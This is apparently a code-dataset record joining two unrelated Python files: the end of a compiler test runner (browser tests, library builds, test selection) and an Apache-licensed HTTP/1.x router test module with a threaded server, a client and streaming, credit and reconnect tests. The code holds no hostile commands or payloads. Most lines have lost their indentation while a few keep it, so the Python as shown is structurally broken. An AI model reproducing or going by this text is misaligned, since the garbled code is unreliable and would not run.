args += ['-DEMTEST_PORT_NUMBER=%d' % self.port, '-include', path_from_root('tests', 'report_result.h')]
if filename_is_src:
filepath = os.path.join(self.get_dir(), 'main.c' if force_c else 'main.cpp')
with open(filepath, 'w') as f:
f.write(src)
else:
filepath = path_from_root('tests', filename)
if reference:
self.reference = reference
expected = [str(i) for i in range(0, reference_slack + 1)]
self.reftest(path_from_root('tests', reference), manually_trigger=manually_trigger_reftest)
if not manual_reference:
args = args + ['--pre-js', 'reftest.js', '-s', 'GL_TESTING=1']
all_args = ['-s', 'IN_TEST_HARNESS=1', filepath, '-o', outfile] + args
# print('all args:', all_args)
try_delete(outfile)
self.compile_btest(all_args)
self.assertExists(outfile)
if post_build:
post_build()
if not isinstance(expected, list):
expected = [expected]
self.run_browser(outfile + url_suffix, message, ['/report_result?' + e for e in expected], timeout=timeout)
# Tests can opt into being run under asmjs as well
if 'WASM=0' not in args and (also_asmjs or self.also_asmjs):
self.btest(filename, expected, reference, force_c, reference_slack, manual_reference, post_build,
args + ['-s', 'WASM=0'], outfile, message, also_proxied=False, timeout=timeout)
if also_proxied:
print('proxied...')
if reference:
assert not manual_reference
manual_reference = True
assert not post_build
post_build = self.post_manual_reftest
# run proxied
self.btest(filename, expected, reference, force_c, reference_slack, manual_reference, post_build,
original_args + ['--proxy-to-worker', '-s', 'GL_TESTING=1'], outfile, message, timeout=timeout)
###################################################################################################
def build_library(name,
build_dir,
output_dir,
generated_libs,
configure=['sh', './configure'],
configure_args=[],
make=['make'],
make_args='help',
cache=None,
cache_name=None,
copy_project=False,
env_init={},
source_dir=None,
native=False):
"""Build a library into a .bc file. We build the .bc file once and cache it
for all our tests. (We cache in memory since the test directory is destroyed
and recreated for each test. Note that we cache separately for different
  compilers.) This cache lasts only for the duration of the test runner; there
  is also a separate, longer-lived caching mechanism, see |Cache|.
"""
if type(generated_libs) is not list:
generated_libs = [generated_libs]
if source_dir is None:
source_dir = path_from_root('tests', name.replace('_native', ''))
if make_args == 'help':
make_args = ['-j', str(multiprocessing.cpu_count())]
temp_dir = build_dir
if copy_project:
project_dir = os.path.join(temp_dir, name)
if os.path.exists(project_dir):
shutil.rmtree(project_dir)
    shutil.copytree(source_dir, project_dir)  # Sometimes useful for debugging: comment this out, along with the two lines above
else:
project_dir = build_dir
  try:
    old_dir = os.getcwd()
  except OSError:
    old_dir = None
os.chdir(project_dir)
generated_libs = [os.path.join(project_dir, lib) for lib in generated_libs]
# for lib in generated_libs:
# try:
# os.unlink(lib) # make sure compilation completed successfully
# except:
# pass
env = Building.get_building_env(native, True)
for k, v in env_init.items():
env[k] = v
if configure:
# Useful in debugging sometimes to comment this out (and the lines below
# up to and including the |link| call)
if EM_BUILD_VERBOSE < 2:
stdout = open(os.path.join(project_dir, 'configure_out'), 'w')
else:
stdout = None
if EM_BUILD_VERBOSE < 1:
stderr = open(os.path.join(project_dir, 'configure_err'), 'w')
else:
stderr = None
try:
Building.configure(configure + configure_args, env=env, stdout=stdout, stderr=stderr)
except subprocess.CalledProcessError as e:
pass # Ignore exit code != 0
def open_make_out(i, mode='r'):
return open(os.path.join(project_dir, 'make_out' + str(i)), mode)
def open_make_err(i, mode='r'):
return open(os.path.join(project_dir, 'make_err' + str(i)), mode)
if EM_BUILD_VERBOSE >= 3:
make_args += ['VERBOSE=1']
# FIXME: Sad workaround for some build systems that need to be run twice to succeed (e.g. poppler)
for i in range(2):
with open_make_out(i, 'w') as make_out:
with open_make_err(i, 'w') as make_err:
stdout = make_out if EM_BUILD_VERBOSE < 2 else None
stderr = make_err if EM_BUILD_VERBOSE < 1 else None
if i == 0:
try:
Building.make(make + make_args, stdout=stdout, stderr=stderr, env=env)
except subprocess.CalledProcessError as e:
pass # Ignore exit code != 0
else:
Building.make(make + make_args, stdout=stdout, stderr=stderr, env=env)
try:
if cache is not None:
cache[cache_name] = []
for f in generated_libs:
basename = os.path.basename(f)
cache[cache_name].append((basename, open(f, 'rb').read()))
break
except Exception as e:
if i > 0:
if EM_BUILD_VERBOSE == 0:
              # Due to the build-twice workaround above, our best guess is to show the output of the first run
with open_make_err(0) as ferr:
for line in ferr:
sys.stderr.write(line)
raise Exception('could not build library ' + name + ' due to exception ' + str(e))
if old_dir:
os.chdir(old_dir)
return generated_libs
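# Everything below implements the command-line entry point of the test runner:
# checking which JS engines work, discovering the test modules, expanding
# wildcard/skip/random test selections, and loading and running the suites.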
def check_js_engines():
total_engines = len(shared.JS_ENGINES)
shared.JS_ENGINES = list(filter(jsrun.check_engine, shared.JS_ENGINES))
if not shared.JS_ENGINES:
print('WARNING: None of the JS engines in JS_ENGINES appears to work.')
elif len(shared.JS_ENGINES) < total_engines:
    print('WARNING: Not all of the JS engines in JS_ENGINES appear to work; ignoring those that do not.')
if EMTEST_ALL_ENGINES:
print('(using ALL js engines)')
else:
logger.warning('use EMTEST_ALL_ENGINES=1 in the env to run against all JS '
'engines, which is slower but provides more coverage')
def get_and_import_modules():
modules = []
for filename in glob.glob(os.path.join(os.path.dirname(__file__), 'test*.py')):
module_dir, module_file = os.path.split(filename)
module_name, module_ext = os.path.splitext(module_file)
__import__(module_name)
modules.append(sys.modules[module_name])
return modules
def get_all_tests(modules):
# Create a list of all known tests so that we can choose from them based on a wildcard search
all_tests = []
suites = core_test_modes + non_core_test_modes
for m in modules:
for s in suites:
if hasattr(m, s):
tests = [t for t in dir(getattr(m, s)) if t.startswith('test_')]
all_tests += [s + '.' + t for t in tests]
return all_tests
def tests_with_expanded_wildcards(args, all_tests):
# Process wildcards, e.g. "browser.test_pthread_*" should expand to list all pthread tests
new_args = []
for i, arg in enumerate(args):
if '*' in arg:
if arg.startswith('skip:'):
arg = arg[5:]
matching_tests = fnmatch.filter(all_tests, arg)
new_args += ['skip:' + t for t in matching_tests]
else:
new_args += fnmatch.filter(all_tests, arg)
else:
new_args += [arg]
if not new_args and args:
print('No tests found to run in set: ' + str(args))
sys.exit(1)
return new_args
def skip_requested_tests(args, modules):
for i, arg in enumerate(args):
if arg.startswith('skip:'):
which = [arg.split('skip:')[1]]
print(','.join(which), file=sys.stderr)
for test in which:
print('will skip "%s"' % test, file=sys.stderr)
suite_name, test_name = test.split('.')
for m in modules:
try:
suite = getattr(m, suite_name)
setattr(suite, test_name, lambda s: s.skipTest("requested to be skipped"))
break
          except AttributeError:
pass
args[i] = None
return [a for a in args if a is not None]
def args_for_random_tests(args, modules):
if not args:
return args
first = args[0]
if first.startswith('random'):
random_arg = first[6:]
num_tests, base_module, relevant_modes = get_random_test_parameters(random_arg)
for m in modules:
if hasattr(m, base_module):
base = getattr(m, base_module)
new_args = choose_random_tests(base, num_tests, relevant_modes)
print_random_test_statistics(num_tests)
return new_args
return args
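# A leading "random" argument selects tests at random: "randomN" picks N tests
# from the default core mode, while "randomotherN" / "randombrowserN" pick N
# tests from the 'other' or 'browser' suites respectively.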
def get_random_test_parameters(arg):
num_tests = 1
base_module = default_core_test_mode
relevant_modes = core_test_modes
if len(arg):
num_str = arg
if arg.startswith('other'):
base_module = 'other'
relevant_modes = ['other']
num_str = arg.replace('other', '')
elif arg.startswith('browser'):
base_module = 'browser'
relevant_modes = ['browser']
num_str = arg.replace('browser', '')
num_tests = int(num_str)
return num_tests, base_module, relevant_modes
def choose_random_tests(base, num_tests, relevant_modes):
tests = [t for t in dir(base) if t.startswith('test_')]
print()
chosen = set()
while len(chosen) < num_tests:
test = random.choice(tests)
mode = random.choice(relevant_modes)
new_test = mode + '.' + test
before = len(chosen)
chosen.add(new_test)
if len(chosen) > before:
print('* ' + new_test)
else:
# we may have hit the limit
if len(chosen) == len(tests) * len(relevant_modes):
print('(all possible tests chosen! %d = %d*%d)' % (len(chosen), len(tests), len(relevant_modes)))
break
return list(chosen)
def print_random_test_statistics(num_tests):
std = 0.5 / math.sqrt(num_tests)
expected = 100.0 * (1.0 - std)
print()
print('running those %d randomly-selected tests. if they all pass, then there is a '
'greater than 95%% chance that at least %.2f%% of the test suite will pass'
% (num_tests, expected))
print()
def show():
print('if all tests passed then there is a greater than 95%% chance that at least '
'%.2f%% of the test suite will pass'
% (expected))
atexit.register(show)
def load_test_suites(args, modules):
loader = unittest.TestLoader()
unmatched_test_names = set(args)
suites = []
for m in modules:
names_in_module = []
for name in list(unmatched_test_names):
try:
operator.attrgetter(name)(m)
names_in_module.append(name)
unmatched_test_names.remove(name)
except AttributeError:
pass
if len(names_in_module):
loaded_tests = loader.loadTestsFromNames(sorted(names_in_module), m)
tests = flattened_tests(loaded_tests)
suite = suite_for_module(m, tests)
for test in tests:
suite.addTest(test)
suites.append((m.__name__, suite))
return suites, unmatched_test_names
def flattened_tests(loaded_tests):
tests = []
for subsuite in loaded_tests:
for test in subsuite:
tests.append(test)
return tests
def suite_for_module(module, tests):
suite_supported = module.__name__ in ('test_core', 'test_other')
has_multiple_tests = len(tests) > 1
has_multiple_cores = parallel_runner.num_cores() > 1
if suite_supported and has_multiple_tests and has_multiple_cores:
return parallel_runner.ParallelTestSuite()
return unittest.TestSuite()
def run_tests(options, suites):
resultMessages = []
num_failures = 0
print('Test suites:')
print([s[0] for s in suites])
# Run the discovered tests
testRunner = unittest.TextTestRunner(verbosity=2)
for mod_name, suite in suites:
print('Running %s: (%s tests)' % (mod_name, suite.countTestCases()))
res = testRunner.run(suite)
msg = ('%s: %s run, %s errors, %s failures, %s skipped' %
(mod_name, res.testsRun, len(res.errors), len(res.failures), len(res.skipped)))
num_failures += len(res.errors) + len(res.failures)
resultMessages.append(msg)
if len(resultMessages) > 1:
print('====================')
print()
print('TEST SUMMARY')
for msg in resultMessages:
print(' ' + msg)
# Return the number of failures as the process exit code for automating success/failure reporting.
return min(num_failures, 255)
def parse_args(args):
parser = argparse.ArgumentParser(prog='runner.py', description=__doc__)
parser.add_argument('-j', '--js-engine', help='Set JS_ENGINE_OVERRIDE')
parser.add_argument('tests', nargs='*')
  return parser.parse_args(args[1:])
def main(args):
options = parse_args(args)
if options.js_engine:
if options.js_engine == 'SPIDERMONKEY_ENGINE':
Building.JS_ENGINE_OVERRIDE = SPIDERMONKEY_ENGINE
elif options.js_engine == 'V8_ENGINE':
Building.JS_ENGINE_OVERRIDE = V8_ENGINE
elif options.js_engine == 'NODE_JS':
Building.JS_ENGINE_OVERRIDE = NODE_JS
else:
print('Unknown js engine override: ' + options.js_engine)
return 1
print("Overriding JS engine: " + Building.JS_ENGINE_OVERRIDE[0])
check_js_engines()
def prepend_default(arg):
if arg.startswith('test_'):
return default_core_test_mode + '.' + arg
return arg
tests = [prepend_default(t) for t in options.tests]
modules = get_and_import_modules()
all_tests = get_all_tests(modules)
tests = tests_with_expanded_wildcards(tests, all_tests)
tests = skip_requested_tests(tests, modules)
tests = args_for_random_tests(tests, modules)
suites, unmatched_tests = load_test_suites(tests, modules)
if unmatched_tests:
print('ERROR: could not find the following tests: ' + ' '.join(unmatched_tests))
return 1
return run_tests(options, suites)
if __name__ == '__main__':
try:
sys.exit(main(sys.argv))
except KeyboardInterrupt:
logger.warning('KeyboardInterrupt')
sys.exit(1)
|
http1_tests.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import socket
import uuid
from threading import Thread
from time import sleep
from http.server import HTTPServer, BaseHTTPRequestHandler
from http.client import HTTPConnection
from http.client import HTTPException
from system_test import TestCase, TIMEOUT, Logger, Qdrouterd, unittest
from system_test import curl_available, run_curl
TEST_SERVER_ERROR = "TestServer failed to start because port %s is already in use"
CURL_VERSION = (7, 47, 0) # minimum required
def _curl_ok():
"""
Returns True if curl is installed and is the proper version for
running http1.1
"""
installed = curl_available()
return installed and installed >= CURL_VERSION
class RequestHandler(BaseHTTPRequestHandler):
"""
Dispatches requests received by the HTTPServer based on the method
"""
protocol_version = 'HTTP/1.1'
def _execute_request(self, tests):
for req, resp, val in tests:
if req.target == self.path:
xhdrs = None
if "test-echo" in self.headers:
xhdrs = {"test-echo":
self.headers["test-echo"]}
self._consume_body()
if not isinstance(resp, list):
resp = [resp]
for r in resp:
r.send_response(self, extra_headers=xhdrs)
self.server.request_count += 1
return
self.send_error(404, "Not Found")
def do_GET(self):
self._execute_request(self.server.system_tests["GET"])
def do_HEAD(self):
self._execute_request(self.server.system_tests["HEAD"])
def do_POST(self):
if self.path == "/SHUTDOWN":
self.send_response(200, "OK")
self.send_header("Content-Length", "13")
self.end_headers()
self.wfile.write(b'Server Closed')
self.wfile.flush()
self.close_connection = True
self.server.server_killed = True
return
self._execute_request(self.server.system_tests["POST"])
def do_PUT(self):
self._execute_request(self.server.system_tests["PUT"])
# these overrides just quiet the test output
# comment them out to help debug:
def log_request(self, code=None, size=None):
pass
def log_message(self, format=None, *args):
pass
def _consume_body(self):
"""
Read the entire body off the rfile. This must be done to allow
multiple requests on the same socket
"""
if self.command == 'HEAD':
return b''
for key, value in self.headers.items():
if key.lower() == 'content-length':
return self.rfile.read(int(value))
if key.lower() == 'transfer-encoding' \
and 'chunked' in value.lower():
body = b''
while True:
header = self.rfile.readline().strip().split(b';')[0]
hlen = int(header, base=16)
if hlen > 0:
data = self.rfile.read(hlen + 2) # 2 = \r\n
body += data[:-2]
else:
self.rfile.readline() # discard last \r\n
break
return body
return b''
class RequestHandler10(RequestHandler):
"""
RequestHandler that forces the server to use HTTP version 1.0 semantics
"""
protocol_version = 'HTTP/1.0'
class MyHTTPServer(HTTPServer):
"""
Adds a switch to the HTTPServer to allow it to exit gracefully
"""
def __init__(self, addr, handler_cls, testcases):
self.system_tests = testcases
self.request_count = 0
HTTPServer.__init__(self, addr, handler_cls)
def server_close(self):
try:
# force immediate close of listening socket
self.socket.shutdown(socket.SHUT_RDWR)
except Exception:
pass
HTTPServer.server_close(self)
class ThreadedTestClient(object):
"""
An HTTP client running in a separate thread
"""
def __init__(self, tests, port, repeat=1):
self._id = uuid.uuid4().hex
self._conn_addr = ("127.0.0.1:%s" % port)
self._tests = tests
self._repeat = repeat
self._logger = Logger(title="TestClient: %s" % self._id,
print_to_console=False)
self._thread = Thread(target=self._run)
self._thread.daemon = True
self.error = None
self.count = 0
self._thread.start()
def _run(self):
self._logger.log("TestClient connecting on %s" % self._conn_addr)
client = HTTPConnection(self._conn_addr, timeout=TIMEOUT)
self._logger.log("TestClient connected")
for loop in range(self._repeat):
self._logger.log("TestClient start request %d" % loop)
for op, tests in self._tests.items():
for req, _, val in tests:
self._logger.log("TestClient sending %s %s request" % (op, req.target))
req.send_request(client,
{"test-echo": "%s-%s-%s-%s" % (self._id,
loop,
op,
req.target)})
self._logger.log("TestClient getting %s response" % op)
try:
rsp = client.getresponse()
except HTTPException as exc:
self._logger.log("TestClient response failed: %s" % exc)
self.error = str(exc)
return
self._logger.log("TestClient response %s received" % op)
if val:
try:
body = val.check_response(rsp)
except Exception as exc:
self._logger.log("TestClient response invalid: %s"
% str(exc))
self.error = "client failed: %s" % str(exc)
return
if req.method == "BODY" and body != b'':
self._logger.log("TestClient response invalid: %s"
% "body present!")
self.error = "error: body present!"
return
self.count += 1
self._logger.log("TestClient request %s %s completed!" %
(op, req.target))
client.close()
self._logger.log("TestClient to %s closed" % self._conn_addr)
def wait(self, timeout=TIMEOUT):
        self._thread.join(timeout=timeout)
        self._logger.log("TestClient %s shut down" % self._conn_addr)
        sleep(0.5)  # fudge factor to allow the socket close to complete
def dump_log(self):
self._logger.dump()
class TestServer(object):
"""
    An HTTPServer running in a separate thread
"""
__test__ = False
@classmethod
def new_server(cls, server_port, client_port, tests, handler_cls=None):
num_attempts = 0
max_attempts = 4
while num_attempts < max_attempts:
try:
# Create an instance of TestServer. This might fail because the port has
# not been relinquished yet. Try for a max of 4 seconds before giving up.
server11 = TestServer(server_port=server_port,
client_port=client_port,
tests=tests,
handler_cls=handler_cls)
# Return the successfully created server.
return server11
except OSError:
# TestServer creation failed. Try again in one second, for a max of 4 seconds.
num_attempts += 1
sleep(1)
return None
def __init__(self, server_port, client_port, tests, handler_cls=None):
self._logger = Logger(title="TestServer", print_to_console=False)
self._client_port = client_port
self._server_addr = ("", server_port)
self._server = MyHTTPServer(self._server_addr,
handler_cls or RequestHandler,
tests)
self._server.allow_reuse_address = True
self._thread = Thread(target=self._run)
self._thread.daemon = True
self._thread.start()
def _run(self):
self._logger.log("TestServer listening on %s:%s" % self._server_addr)
try:
self._server.server_killed = False
while not self._server.server_killed:
self._server.handle_request()
except Exception as exc:
self._logger.log("TestServer %s crash: %s" %
(self._server_addr, exc))
raise
self._logger.log("TestServer %s:%s closed" % self._server_addr)
def wait(self, timeout=TIMEOUT):
self._logger.log("TestServer %s:%s shutting down" % self._server_addr)
self.request_count = 0
if self._thread.is_alive():
client = HTTPConnection("127.0.0.1:%s" % self._client_port,
timeout=TIMEOUT)
client.putrequest("POST", "/SHUTDOWN")
client.putheader("Content-Length", "0")
client.endheaders()
# 13 == len('Server Closed')
client.getresponse().read(13)
client.close()
        self._thread.join(timeout=timeout)
if self._server:
self._server.server_close()
self.request_count = self._server.request_count
del self._server
        sleep(0.5)  # fudge factor to allow the socket close to complete
def http1_ping(sport, cport):
"""
Test the HTTP path by doing a simple GET request
"""
TEST = {
"GET": [
(RequestMsg("GET", "/GET/ping",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 4,
"Content-Type": "text/plain;charset=utf-8"},
body=b'pong'),
ResponseValidator(expect_body=b'pong'))
]
}
server = TestServer.new_server(sport, cport, TEST)
client = ThreadedTestClient(tests=TEST, port=cport)
client.wait()
server.wait()
return client.count, client.error
class ResponseMsg(object):
"""
A 'hardcoded' HTTP response message. This class writes its response
message when called by the HTTPServer via the BaseHTTPRequestHandler
"""
def __init__(self, status, version=None, reason=None,
headers=None, body=None, error=False):
self.status = status
self.version = version or "HTTP/1.1"
self.reason = reason
self.headers = headers or {}
self.body = body
self.error = error
def send_response(self, handler, extra_headers=None):
extra_headers = extra_headers or {}
if self.error:
handler.send_error(self.status,
message=self.reason)
return
handler.send_response(self.status, self.reason)
for key, value in self.headers.items():
handler.send_header(key, value)
for key, value in extra_headers.items():
handler.send_header(key, value)
handler.end_headers()
if self.body:
handler.wfile.write(self.body)
handler.wfile.flush()
class RequestMsg(object):
"""
A 'hardcoded' HTTP request message. This class writes its request
message to the HTTPConnection.
"""
def __init__(self, method, target, headers=None, body=None):
self.method = method
self.target = target
self.headers = headers or {}
self.body = body
def send_request(self, conn, extra_headers=None):
extra_headers = extra_headers or {}
conn.putrequest(self.method, self.target)
for key, value in self.headers.items():
conn.putheader(key, value)
for key, value in extra_headers.items():
conn.putheader(key, value)
conn.endheaders()
if self.body:
conn.send(self.body)
class ResponseValidator(object):
"""
Validate a response as received by the HTTP client
"""
def __init__(self, status=200, expect_headers=None, expect_body=None):
if expect_headers is None:
expect_headers = {}
self.status = status
self.expect_headers = expect_headers
self.expect_body = expect_body
def check_response(self, rsp):
if self.status and rsp.status != self.status:
raise Exception("Bad response code, expected %s got %s"
% (self.status, rsp.status))
for key, value in self.expect_headers.items():
if rsp.getheader(key) != value:
raise Exception("Missing/bad header (%s), expected %s got %s"
% (key, value, rsp.getheader(key)))
body = rsp.read()
if self.expect_body and self.expect_body != body:
raise Exception("Bad response body expected %s got %s"
% (self.expect_body, body))
return body
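# Mixin of HTTP/1.x tests run between two edge routers; subclasses are
# expected to provide the router fixtures (e.g. self.EA2) and the
# http_server*/http_listener* ports used below.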
class CommonHttp1Edge2EdgeTest(object):
def test_01_concurrent_requests(self):
"""
Test multiple concurrent clients sending streaming messages
"""
REQ_CT = 3 # 3 requests per TEST_*
TESTS_11 = {
"PUT": [
(RequestMsg("PUT", "/PUT/test_01_concurrent_requests_11",
headers={
"Transfer-encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"
},
# ~384K to trigger Q2
body=b'20000\r\n' + b'1' * 0x20000 + b'\r\n'
+ b'20000\r\n' + b'2' * 0x20000 + b'\r\n'
+ b'20000\r\n' + b'3' * 0x20000 + b'\r\n'
+ b'13\r\nEND OF TRANSMISSION\r\n'
+ b'0\r\n\r\n'),
ResponseMsg(201, reason="Created",
headers={"Test-Header": "/PUT/test_01_concurrent_requests_11",
"Content-Length": "0"}),
ResponseValidator(status=201)
)],
"GET": [
(RequestMsg("GET", "/GET/test_01_concurrent_requests_11_small",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={
"Content-Length": "19",
"Content-Type": "text/plain;charset=utf-8",
"Test-Header": "/GET/test_01_concurrent_requests_11_small"
},
body=b'END OF TRANSMISSION'),
ResponseValidator(status=200)),
(RequestMsg("GET", "/GET/test_01_concurrent_requests_11",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={
"transfer-Encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8",
"Test-Header": "/GET/test_01_concurrent_requests_11"
},
# ~384K to trigger Q2
body=b'20000\r\n' + b'1' * 0x20000 + b'\r\n'
+ b'20000\r\n' + b'2' * 0x20000 + b'\r\n'
+ b'20000\r\n' + b'3' * 0x20000 + b'\r\n'
+ b'13\r\nEND OF TRANSMISSION\r\n'
+ b'0\r\n\r\n'),
ResponseValidator(status=200)
)],
}
TESTS_10 = {
"POST": [
(RequestMsg("POST", "/POST/test_01_concurrent_requests_10",
headers={"Content-Type": "text/plain;charset=utf-8",
"Content-Length": "393216"},
body=b'P' * 393197
+ b'END OF TRANSMISSION'),
ResponseMsg(201, reason="Created",
headers={"Test-Header": "/POST/test_01_concurrent_requests_10",
"Content-Length": "0"}),
ResponseValidator(status=201)
)],
"GET": [
(RequestMsg("GET", "/GET/test_01_concurrent_requests_10_small",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
# no content-length, server must close conn when done
headers={"Test-Header": "/GET/test_01_concurrent_requests_10_small",
"Content-Type": "text/plain;charset=utf-8"},
body=b'END OF TRANSMISSION'),
ResponseValidator(status=200)),
(RequestMsg("GET", "/GET/test_01_concurrent_requests_10",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Test-Header": "/GET/test_01_concurrent_requests_10",
"Content-Length": "393215",
"Content-Type": "text/plain;charset=utf-8"},
body=b'G' * 393196
+ b'END OF TRANSMISSION'),
ResponseValidator(status=200)
)],
}
server11 = TestServer.new_server(self.http_server11_port, self.http_listener11_port, TESTS_11)
self.assertIsNotNone(server11, TEST_SERVER_ERROR % self.http_server11_port)
server10 = TestServer.new_server(self.http_server10_port, self.http_listener10_port, TESTS_10,
handler_cls=RequestHandler10)
self.assertIsNotNone(server10, TEST_SERVER_ERROR % self.http_server10_port)
self.EA2.wait_connectors()
repeat_ct = 10
client_ct = 4 # per version
clients = []
for _ in range(client_ct):
clients.append(ThreadedTestClient(TESTS_11,
self.http_listener11_port,
repeat=repeat_ct))
clients.append(ThreadedTestClient(TESTS_10,
self.http_listener10_port,
repeat=repeat_ct))
for client in clients:
client.wait()
try:
self.assertIsNone(client.error)
self.assertEqual(repeat_ct * REQ_CT, client.count)
except Exception:
client.dump_log()
raise
server11.wait()
self.assertEqual(client_ct * repeat_ct * REQ_CT,
server11.request_count)
server10.wait()
self.assertEqual(client_ct * repeat_ct * REQ_CT,
server10.request_count)
def test_02_credit_replenish(self):
"""
Verify credit is replenished by sending > the default credit window
requests across the routers. The default credit window is 250
"""
TESTS = {
"GET": [
(RequestMsg("GET", "/GET/test_02_credit_replenish",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": "24",
"Content-Type": "text/plain;charset=utf-8"},
body=b'test_02_credit_replenish'),
ResponseValidator(status=200),
),
]
}
server = TestServer.new_server(self.http_server11_port, self.http_listener11_port, TESTS)
self.assertIsNotNone(server, TEST_SERVER_ERROR % self.http_server11_port)
self.EA2.wait_connectors()
client = ThreadedTestClient(TESTS,
self.http_listener11_port,
repeat=300)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(300, client.count)
server.wait()
def test_03_server_reconnect(self):
"""
Verify server reconnect logic.
"""
TESTS = {
"GET": [
(RequestMsg("GET", "/GET/test_03_server_reconnect",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": "24",
"Content-Type": "text/plain;charset=utf-8"},
body=b'test_03_server_reconnect'),
ResponseValidator(status=200),
),
]
}
# bring up the server and send some requests. This will cause the
# router to grant credit for clients
server = TestServer.new_server(self.http_server11_port, self.http_listener11_port, TESTS)
self.assertIsNotNone(server, TEST_SERVER_ERROR % self.http_server11_port)
self.EA2.wait_connectors()
client = ThreadedTestClient(TESTS,
self.http_listener11_port,
repeat=2)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(2, client.count)
# simulate server loss. Fire up a client which should be granted
        # credit since the adaptor does not immediately tear down the server
        # links. This will cause the adaptor to run qdr_connection_process
        # without a raw connection available to wake the I/O thread.
server.wait()
client = ThreadedTestClient(TESTS,
self.http_listener11_port,
repeat=2)
# the adaptor will detach the links to the server if the connection
# cannot be reestablished after 2.5 seconds. Restart the server before
        # that occurs to prevent client messages from being released with 503
# status.
server = TestServer.new_server(self.http_server11_port, self.http_listener11_port, TESTS)
self.assertIsNotNone(server, TEST_SERVER_ERROR % self.http_server11_port)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(2, client.count)
server.wait()
def test_04_server_pining_for_the_fjords(self):
"""
Test permanent loss of server
"""
TESTS = {
"GET": [
(RequestMsg("GET", "/GET/test_04_fjord_pining",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": "20",
"Content-Type": "text/plain;charset=utf-8"},
body=b'test_04_fjord_pining'),
ResponseValidator(status=200),
),
]
}
# bring up the server and send some requests. This will cause the
# router to grant credit for clients
server = TestServer.new_server(self.http_server11_port, self.http_listener11_port, TESTS)
self.assertIsNotNone(server, TEST_SERVER_ERROR % self.http_server11_port)
self.EA2.wait_connectors()
client = ThreadedTestClient(TESTS, self.http_listener11_port)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(1, client.count)
TESTS_FAIL = {
"GET": [
(RequestMsg("GET", "/GET/test_04_fjord_pining",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": "20",
"Content-Type": "text/plain;charset=utf-8"},
body=b'test_04_fjord_pining'),
ResponseValidator(status=503),
),
]
}
# Kill the server then issue client requests. These requests will be
# held on the server's outgoing links until they expire (2.5 seconds).
# At that point the client will receive a 503 response.
server.wait()
client = ThreadedTestClient(TESTS_FAIL, self.http_listener11_port)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(1, client.count)
# ensure links recover once the server re-appears
server = TestServer.new_server(self.http_server11_port, self.http_listener11_port, TESTS)
self.assertIsNotNone(server, TEST_SERVER_ERROR % self.http_server11_port)
self.EA2.wait_connectors()
client = ThreadedTestClient(TESTS, self.http_listener11_port)
client.wait()
self.assertIsNone(client.error)
self.assertEqual(1, client.count)
server.wait()
def test_05_large_streaming_msg(self):
"""
Verify large streaming message transfer
"""
TESTS_11 = {
"PUT": [
(RequestMsg("PUT", "/PUT/streaming_test_11",
headers={
"Transfer-encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"
},
# 4 chunks each ~= 600K
body=b'927C1\r\n' + b'0' * 0x927C0 + b'X\r\n'
+ b'927C0\r\n' + b'1' * 0x927C0 + b'\r\n'
+ b'927C1\r\n' + b'2' * 0x927C0 + b'X\r\n'
+ b'927C0\r\n' + b'3' * 0x927C0 + b'\r\n'
+ b'0\r\n\r\n'),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "data",
"Content-Length": "0"}),
ResponseValidator(status=201))
],
"GET": [
(RequestMsg("GET", "/GET/streaming_test_11",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={
"transfer-Encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"
},
                         # two 1.2MB chunks
body=b'124f80\r\n' + b'4' * 0x124F80 + b'\r\n'
+ b'124f80\r\n' + b'5' * 0x124F80 + b'\r\n'
+ b'0\r\n\r\n'),
ResponseValidator(status=200))
],
}
TESTS_10 = {
"POST": [
(RequestMsg("POST", "/POST/streaming_test_10",
headers={"Header-1": "H" * 2048,
"Content-Length": "2097155",
"Content-Type": "text/plain;charset=utf-8"},
body=b'P' * 2097155),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "data",
"Content-Length": "0"}),
ResponseValidator(status=201))
],
"GET": [
(RequestMsg("GET", "/GET/streaming_test_10",
headers={"Content-Length": "000"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": "1999999",
"Content-Type": "text/plain;charset=utf-8"},
body=b'G' * 1999999),
ResponseValidator(status=200))
],
}
server11 = TestServer.new_server(self.http_server11_port, self.http_listener11_port, TESTS_11)
self.assertIsNotNone(server11, TEST_SERVER_ERROR % self.http_server11_port)
server10 = TestServer.new_server(self.http_server10_port, self.http_listener10_port, TESTS_10,
handler_cls=RequestHandler10)
self.assertIsNotNone(server10, TEST_SERVER_ERROR % self.http_server10_port)
self.EA2.wait_connectors()
client11 = ThreadedTestClient(TESTS_11,
self.http_listener11_port,
repeat=2)
client11.wait()
self.assertIsNone(client11.error)
self.assertEqual(4, client11.count)
client10 = ThreadedTestClient(TESTS_10,
self.http_listener10_port,
repeat=2)
client10.wait()
self.assertIsNone(client10.error)
self.assertEqual(4, client10.count)
server11.wait()
server10.wait()
